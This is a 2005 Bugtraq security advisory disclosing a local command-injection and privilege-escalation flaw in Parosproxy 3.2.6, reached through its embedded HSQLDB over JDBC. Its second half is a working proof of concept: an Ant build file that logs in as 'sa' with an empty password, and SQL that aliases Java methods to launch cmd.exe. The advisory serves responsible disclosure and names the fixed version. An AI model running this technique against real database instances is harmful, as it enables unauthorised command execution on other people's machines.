Bugtraq mailing list archives
Parosproxy 3.2.6: Local Exploitation, Command injection vulnerability
From: Marc Schoenefeld <marc.schoenefeld () gmx org>
Date: Fri, 04 Nov 2005 17:14:41 +0100
Hello, first word to say: Parosproxy is a great tool, it has helped me a lot during pentesting. Unfortunately the JDK until version 1.4.2_08 is vulnerable in a way that allows to use JDBC as an attack path. Parosproxy uses JDBC to persist some state data. Concerning the release 3.2.6 of Parosproxy [www.parosproxy.org], there is a minor problem when running it with JDK 1.4.2 until subrelease 08. It can be used to trigger command injection in the embedded HSQLDB via the JDBC (localhost on port 9001) by another (like unprivileged user with lesser rights than the paros process) user on the machine. This results in privilege escalation.Demonstration files (see below) have been provided to contact () parosproxy org. A similar problem with HSQLDB has occured a while ago when exploiting former
version of JBoss [http://www.illegalaccess.org/java/jboss.php], you will find further details there. According to parosproxy.org this problem has been solved with Paros version 3.2.7. Please update your old 3.2.6 or older version, it's good and it's free ! Sincerely Marc Schönefeld =======build.xml========== <project name="sql" default="exec"> <target name="exec"> <sql driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:hsql://localhost:9001" userid="sa" password="" print="true"> <fileset dir="."> <include name="*.sql"/> </fileset> <classpath> <pathelement location="lib.jar"/> </classpath> </sql> </target> </project> =======build.xml========== =======exec.sql========== CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug" ; CALL COMPDEBUG(true); CREATE ALIAS SETPROP FOR "java.lang.System.setProperty"; CALL SETPROP ('org.apache.xml.utils.synthetic.javac','cmd.exe') ; CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile" ; CALL COMPILE('a','/c "cmd.exe /c notepad.exe c:\windows\system32\drivers\etc\hosts >" ') ; CREATE ALIAS GETPROP FOR "java.lang.System.getProperty"; CALL GETPROP('org.apache.xml.utils.synthetic.javac') ; =======exec.sql==========
Current thread:
- Parosproxy 3.2.6: Local Exploitation, Command injection vulnerability Marc Schoenefeld (Nov 04)